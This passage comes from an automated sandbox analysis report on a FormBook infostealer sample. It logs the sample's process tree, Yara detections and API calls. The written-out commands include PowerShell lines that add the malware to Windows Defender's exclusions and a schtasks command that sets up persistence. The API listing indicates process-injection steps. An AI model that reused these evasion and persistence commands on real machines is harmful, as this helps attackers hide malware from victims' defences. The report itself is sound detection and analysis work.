                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Jul 9, 2024 12:11:17.277434111 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Tue, 09 Jul 2024 10:11:17 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 548
                                                      Connection: close
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                      Target ID:0
                                                      Start time:06:07:13
                                                      Start date:09/07/2024
                                                      Path:C:\Users\user\Desktop\Inquiry PR#27957.bat.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\Inquiry PR#27957.bat.exe"
                                                      Imagebase:0xae0000
                                                      File size:879'624 bytes
                                                      MD5 hash:9972524538C9F43A23AD683DA0A1A97A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:3
                                                      Start time:06:07:15
                                                      Start date:09/07/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe"
                                                      Imagebase:0x30000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:4
                                                      Start time:06:07:15
                                                      Start date:09/07/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:5
                                                      Start time:06:07:16
                                                      Start date:09/07/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fuqwoDzun.exe"
                                                      Imagebase:0x30000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:6
                                                      Start time:06:07:16
                                                      Start date:09/07/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:7
                                                      Start time:06:07:16
                                                      Start date:09/07/2024
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp2C94.tmp"
                                                      Imagebase:0x1e0000
                                                      File size:187'904 bytes
                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:8
                                                      Start time:06:07:16
                                                      Start date:09/07/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:9
                                                      Start time:06:07:16
                                                      Start date:09/07/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                      Imagebase:0xb90000
                                                      File size:45'984 bytes
                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1645996592.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1645996592.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1647315768.0000000002340000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1647315768.0000000002340000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:10
                                                      Start time:06:07:19
                                                      Start date:09/07/2024
                                                      Path:C:\Users\user\AppData\Roaming\fuqwoDzun.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Roaming\fuqwoDzun.exe
                                                      Imagebase:0x200000
                                                      File size:879'624 bytes
                                                      MD5 hash:9972524538C9F43A23AD683DA0A1A97A
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 34%, ReversingLabs
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:11
                                                      Start time:06:07:19
                                                      Start date:09/07/2024
                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                      Imagebase:0x7ff72d8c0000
                                                      File size:496'640 bytes
                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:12
                                                      Start time:06:07:21
                                                      Start date:09/07/2024
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp40A9.tmp"
                                                      Imagebase:0x1e0000
                                                      File size:187'904 bytes
                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:13
                                                      Start time:06:07:21
                                                      Start date:09/07/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff70f010000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:14
                                                      Start time:06:07:21
                                                      Start date:09/07/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                      Imagebase:0x680000
                                                      File size:45'984 bytes
                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.1858896914.0000000003320000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.1858896914.0000000003320000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:16
                                                      Start time:06:07:38
                                                      Start date:09/07/2024
                                                      Path:C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe"
                                                      Imagebase:0x5c0000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:17
                                                      Start time:06:07:40
                                                      Start date:09/07/2024
                                                      Path:C:\Windows\SysWOW64\sfc.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\sfc.exe"
                                                      Imagebase:0xe40000
                                                      File size:40'448 bytes
                                                      MD5 hash:4D2662964EF299131D049EC1278BE08B
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.3788281912.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.3788281912.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.3788326451.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.3788326451.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.3785830120.0000000000A50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.3785830120.0000000000A50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      Has exited:false

                                                      Target ID:18
                                                      Start time:06:07:52
                                                      Start date:09/07/2024
                                                      Path:C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe"
                                                      Imagebase:0x5c0000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.3788370711.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.3788370711.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                      Has exited:false

                                                      Target ID:19
                                                      Start time:06:08:01
                                                      Start date:09/07/2024
                                                      Path:C:\Windows\SysWOW64\sfc.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\sfc.exe"
                                                      Imagebase:0xe40000
                                                      File size:40'448 bytes
                                                      MD5 hash:4D2662964EF299131D049EC1278BE08B
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.1956019902.0000000000C90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.1956019902.0000000000C90000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      Has exited:true

                                                      Target ID:21
                                                      Start time:06:08:04
                                                      Start date:09/07/2024
                                                      Path:C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe"
                                                      Imagebase:0x5c0000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.3791731697.00000000050A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.3791731697.00000000050A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      Has exited:false

                                                      Target ID:25
                                                      Start time:06:08:21
                                                      Start date:09/07/2024
                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                      Imagebase:0x7ff73feb0000
                                                      File size:676'768 bytes
                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true


                                                        Execution Graph

                                                        Execution Coverage:10.5%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:19.3%
                                                        Total number of Nodes:244
                                                        Total number of Limit Nodes:12

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1364658564.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5430000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: '$($,$4$6$9$:$H$U$U$c$c$e$e$k$l$l$l$w$$%q
                                                        • API String ID: 0-2663843966
                                                        • Opcode ID: d695bb919f2b96574d8710692d0a32e19e235b3d5b534aaca9ace223f8b537d0
                                                        • Instruction ID: 9598dde88d87d3e0b015396a053ec1050957a15224e0ffa7b1fa9b49d80acd20
                                                        • Opcode Fuzzy Hash: d695bb919f2b96574d8710692d0a32e19e235b3d5b534aaca9ace223f8b537d0
                                                        • Instruction Fuzzy Hash: 6433D230A007148FDB65EF79C894BDAB7B6AF89300F5045AED44AAB360DB71AD81CF51

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1364658564.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5430000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: '$($,$4$6$9$:$H$U$U$c$c$e$e$k$l$l$l$w$$%q
                                                        • API String ID: 0-2663843966
                                                        • Opcode ID: 219a0dbd3913814e2d478c9e77d86dbf3bde740fd24b59e58f45a55259cfe4aa
                                                        • Instruction ID: 2433f58a48878670edb4f752f0a547c14b331c0c2a6bdbd5c7b7580ff8d50a30
                                                        • Opcode Fuzzy Hash: 219a0dbd3913814e2d478c9e77d86dbf3bde740fd24b59e58f45a55259cfe4aa
                                                        • Instruction Fuzzy Hash: 2B23D234A007148FDB65EF79C854BDAB7B6AF89300F5045AED44AAB360DF31AA81CF51

                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07345516
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 384a8a3176b0d3cfed2b263f7ffdc098c11deacf270c5fd591a0a4508ac69c74
                                                        • Instruction ID: bee19a1254685514c98d18334bf204924fbaee1de01c395302dd73c74143987e
                                                        • Opcode Fuzzy Hash: 384a8a3176b0d3cfed2b263f7ffdc098c11deacf270c5fd591a0a4508ac69c74
                                                        • Instruction Fuzzy Hash: BFA148B1D00219DFEB24CFA8C8417EDBBF2EB48314F1481A9E809A7250DB75A995CF91

                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07345516
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 7dc49a64ba83eaf2ec06c633cf56a2a3f26c229004005eb7259e4ffaa140c6d4
                                                        • Instruction ID: 81ee58f3e33021c244195e96d06ae2195c5892a61823dc529da6988425d183c6
                                                        • Opcode Fuzzy Hash: 7dc49a64ba83eaf2ec06c633cf56a2a3f26c229004005eb7259e4ffaa140c6d4
                                                        • Instruction Fuzzy Hash: 7E9149B1D00219DFEB24CFA8C8417EDBBF2EF48314F1481A9E849A7250DB75A995CF91

                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05434922
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1364658564.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5430000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        • Opcode ID: 5544a56f4aa3632310c832765e76ac4226280abfce49bf1de95c62bcd5113073
                                                        • Instruction ID: eb279c6f69aa0eb52262c9e20ce513dbf6586587cc2d14bd5a2e3fb712575aec
                                                        • Opcode Fuzzy Hash: 5544a56f4aa3632310c832765e76ac4226280abfce49bf1de95c62bcd5113073
                                                        • Instruction Fuzzy Hash: 1251C1B5D103499FDF14CFAAC885ADEBBB5FF48310F64812AE819AB220D7749845CF90

                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05434922
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1364658564.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5430000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        • Opcode ID: 1a9a7269ca67427dd9ea43581c2a4e69d6e367d4957c32524c32ec3d1bc020c2
                                                        • Instruction ID: 8f20aee0680ed9695fb8fe5ba541ffbbcb33b1f321d06b39fcd5f4ed343d3863
                                                        • Opcode Fuzzy Hash: 1a9a7269ca67427dd9ea43581c2a4e69d6e367d4957c32524c32ec3d1bc020c2
                                                        • Instruction Fuzzy Hash: BD51CFB5D003489FDF14CFAAC885ADEBBB5FF48310F24812AE819AB220D7759845CF90

                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 02DB59A9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1351684000.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2db0000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: 3fa2a31014f265232ca4c5a513d7bc92a071d09e9df455016ca3b2208f09908a
                                                        • Instruction ID: a4a35edf1f840aec2bd3995a71bf399481b96355ab406478a3d316a980b65077
                                                        • Opcode Fuzzy Hash: 3fa2a31014f265232ca4c5a513d7bc92a071d09e9df455016ca3b2208f09908a
                                                        • Instruction Fuzzy Hash: 4E41FFB5C04718CBDB25CFA9C884BCEBBB1BF49304F60806AD459AB251DB75694ACF50

                                                        APIs
                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 05436EA1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1364658564.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5430000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: CallProcWindow
                                                        • String ID:
                                                        • API String ID: 2714655100-0

                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 02DB59A9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1351684000.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2db0000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0

                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 073451C8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0

                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 073450E8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0

                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07344F3E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0

                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 073450E8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0

                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07344F3E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0

                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 073451C8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07345006
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02DBDF01,00000800,00000000,00000000), ref: 02DBE112
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1351684000.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2db0000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07345006
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 073495E5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        APIs
